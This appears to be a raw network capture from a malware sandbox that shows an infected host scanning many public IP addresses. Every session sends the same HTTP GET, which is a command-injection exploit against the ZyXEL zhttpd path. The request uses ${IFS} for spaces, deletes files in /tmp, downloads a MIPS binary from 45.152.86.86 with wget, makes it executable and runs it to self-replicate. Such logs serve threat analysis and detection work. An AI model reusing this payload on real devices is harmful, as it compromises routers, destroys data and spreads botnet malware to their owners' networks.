                              Mar 31, 2024 08:41:46.083429098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6501192.168.2.1354842218.216.122.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083462000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6502192.168.2.1349886156.211.104.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083507061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6503192.168.2.1359506220.186.142.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083515882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6504192.168.2.1333756173.162.31.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083559990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6505192.168.2.1356668148.166.138.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083595991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6506192.168.2.135011425.134.177.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083651066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6507192.168.2.13383825.224.1.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083669901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6508192.168.2.133358014.139.89.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083698034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6509192.168.2.1335556118.162.58.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083730936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6510192.168.2.135781434.44.88.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083796978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6511192.168.2.134232488.92.119.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083830118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6512192.168.2.1344078162.129.108.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083865881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6513192.168.2.1354328122.148.77.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083906889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6514192.168.2.13535569.173.23.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083942890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6515192.168.2.1351184185.51.48.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083970070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6516192.168.2.134738245.179.71.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083992004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6517192.168.2.1356026181.175.39.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084028006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6518192.168.2.1359056207.179.25.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084069967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6519192.168.2.1349772174.132.100.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084108114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6520192.168.2.1356294177.63.96.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084155083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6521192.168.2.133472417.42.215.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084207058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6522192.168.2.1349274173.169.38.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084245920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6523192.168.2.1357300102.247.46.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084270954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6524192.168.2.1353564221.134.247.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084332943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6525192.168.2.1336622185.227.239.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084379911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6526192.168.2.135253013.117.218.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084423065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6527192.168.2.1335140147.204.193.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084464073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6528192.168.2.135036860.202.38.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084502935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6529192.168.2.1348358144.140.68.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084549904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6530192.168.2.1343358159.204.202.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084597111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6531192.168.2.1337946205.53.43.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084616899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6532192.168.2.134458248.239.239.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084667921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6533192.168.2.133669024.250.11.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084681988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6534192.168.2.1346378113.253.98.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084728956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6535192.168.2.1353050187.149.236.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084781885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6536192.168.2.1335868154.16.147.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084830046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6537192.168.2.1334228192.84.11.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084860086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6538192.168.2.13390428.118.161.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084916115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6539192.168.2.1357656194.93.55.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.084949970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6540192.168.2.1340760212.3.237.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085007906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6541192.168.2.1336600162.204.59.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085051060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6542192.168.2.1358768166.159.203.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085097075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6543192.168.2.133294450.35.7.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085122108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6544192.168.2.1337812100.204.30.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085155010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6545192.168.2.1355240169.106.243.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085186958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6546192.168.2.1350112137.63.187.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085238934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6547192.168.2.1349578122.217.7.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085278988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6548192.168.2.1343212172.209.2.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085314989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6549192.168.2.135836271.114.90.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085369110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6550192.168.2.1337862126.166.191.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085400105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6551192.168.2.13568545.36.199.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085458994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6552192.168.2.1335482222.34.236.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085491896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6553192.168.2.134365871.213.34.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085525036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6554192.168.2.135575858.251.34.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085557938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6555192.168.2.1341426166.199.45.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085603952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6556192.168.2.1355208195.36.206.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085654974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6557192.168.2.13443102.97.66.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085689068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6558192.168.2.1344216116.133.253.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085727930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6559192.168.2.1336010102.44.208.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085756063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6560192.168.2.1360032212.151.252.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085797071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6561192.168.2.134173017.104.26.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085840940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6562192.168.2.1343244169.215.85.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085870981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6563192.168.2.1351554115.72.235.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085901022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6564192.168.2.1353678111.198.249.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085947990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6565192.168.2.1347544184.231.162.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.085999966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6566192.168.2.135688092.0.145.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086023092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6567192.168.2.1342948163.12.65.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086081028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6568192.168.2.1354840101.130.183.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.086116076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6569192.168.2.1349276147.63.46.169443
                              TimestampBytes transferredDirectionData
